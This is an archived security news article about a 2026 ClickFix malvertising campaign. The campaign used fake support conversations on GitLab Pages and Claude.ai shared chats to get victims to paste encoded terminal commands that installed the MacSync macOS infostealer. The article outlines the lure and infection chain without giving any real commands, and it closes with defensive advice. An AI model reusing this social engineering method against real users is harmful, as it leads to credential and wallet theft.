CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 18, 2026

Hackers Abuse Claude.ai Shared Chat Feature to Host the ClickFix Social Engineering Instructions

Cybersecurity News Archived Jun 18, 2026 ✓ Full text saved

Hackers are increasingly exploiting trusted AI platforms to deliver sophisticated social engineering attacks, with a recent campaign abusing Claude.ai’s shared chat feature to host malicious ClickFix instructions. According to TrendAI Research, attackers deployed 106 unique malicious hostnames across six campaign waves within seven weeks, continuously rotating infrastructure and testing different AI-themed lures to maximize effectiveness. […] The post Hackers Abuse Claude.ai Shared Chat Feature

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeAI Hackers Abuse Claude.ai Shared Chat Feature to Host the ClickFix Social Engineering Instructions By Abinaya June 18, 2026 Hackers are increasingly exploiting trusted AI platforms to deliver sophisticated social engineering attacks, with a recent campaign abusing Claude.ai’s shared chat feature to host malicious ClickFix instructions. According to TrendAI Research, attackers deployed 106 unique malicious hostnames across six campaign waves within seven weeks, continuously rotating infrastructure and testing different AI-themed lures to maximize effectiveness. The operation marks a significant evolution in ClickFix tactics, shifting from traditional malicious hosting to trusted platforms like Claude.ai. The campaign initially relied on GitLab Pages, using over 90 malicious subdomains hosted under the trusted *. gitlab.io domain. These pages impersonated popular AI developer tools, including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains. By leveraging Google Ads, threat actors targeted users actively searching for these tools, increasing the likelihood of interaction from technically skilled individuals. ClickFix attacks rely on tricking users into manually executing malicious commands. In this campaign, victims were instructed to copy and paste terminal or PowerShell commands under the pretense of installing or fixing software. Claude Shared Chats Abused for ClickFix Attacks This technique bypasses many traditional security controls because the user unknowingly executes the payload. The campaign escalated significantly in May 2026, when attackers pivoted to abusing Claude.ai’s shared chat feature. Claude Malvertising Campaign Infection Chain (Source: TrendMicro) Instead of directing victims to suspicious domains, malicious ads redirected users to legitimate Claude.ai shared chat URLs. These pages appeared trustworthy, effectively bypassing browser warnings, URL inspection, and Safe Browsing protections. Once on the page, victims encountered fake support conversations impersonating entities such as Apple Support or development teams. These chats provided step-by-step instructions for opening a terminal and executing a command. The command typically included a base64-encoded script that, once decoded, fetched a second-stage payload. Top 20 Countries Targeted by the Campaign (Source: TrendMicro) Analysis revealed that the payload delivered the MacSync infostealer, which targets macOS systems. The malware collects browser credentials, cookies, SSH keys, and cryptocurrency wallet data, then exfiltrates them to attacker-controlled servers. Notably, the malware includes a check for Russian keyboard layouts, likely to avoid infecting systems in CIS regions. The campaign’s geographic targeting was heavily concentrated in the Asia-Pacific region, which accounted for over 67 percent of victims. “Running Claude Code on Mac” – A Shared Chat Posing as Apple Support (Source: TrendMicro) Taiwan alone represented more than 30 percent of observed traffic, followed by Japan and Singapore. Later waves expanded targeting to countries including India, France, and Italy, indicating ongoing optimization of ad targeting strategies. TrendAI researchers observed at least 45 malicious Claude.ai shared chat instances in early stages, increasing to over 60 in later waves. This shift to trusted infrastructure removes many traditional detection signals, leaving user awareness as the primary defense. Top 10 Countries by Confirmed Victim Interactions (Source: TrendMicro) Following responsible disclosure, Anthropic took action by banning the malicious accounts, removing harmful shared chats, and implementing additional safeguards to prevent abuse of the feature. Security experts warn that this campaign highlights a broader trend where attackers weaponize legitimate platforms to evade detection. As AI tools become more embedded in developer workflows, such abuse is expected to increase. Organizations are advised to educate users about ClickFix-style attacks, monitor unusual command execution, and deploy endpoint detection solutions. Users should avoid installing software via search ads, verify URLs carefully, and never execute commands from untrusted sources. Follow us on Google News, LinkedIn, and X to Get More Instant Updates. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Abinayahttps://cybersecuritynews.com/ Abi is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space. Trending News 152 Chrome Extensions Hide Ad Tracking and Fake Google Search Traffic Google Sues Chinese Cybercrime Network for Using Gemini AI to Launch Cyberattacks SHEETCREEP C# RAT Abuses Google Sheets API as C2 to Target Diplomatic Organizations Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence Google Patches 28 Chrome Vulnerabilities that Allow Attackers to Execute Malicious Code Latest News Technology Modern Data Protection Standards: How Organizations Are Strengthening Cybersecurity in 2026 Cyber Security News F5 Patches NGINX Vulnerability That Enables Code Execution and DoS Attacks Cyber Security News Hackers Abuse PowerShell Commands to Deliver SmartRAT Through Brazilian Bank Phishing Page Cyber Security News Evilginx AiTM Attack Captures Microsoft Credentials, MFA Tokens, and Authenticated Sessions Cyber Security PoC Exploit Released for HTTP/2 Bomb Remote DoS Vulnerability in Apache HTTP Server
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    Jun 18, 2026
    Archived
    Jun 18, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗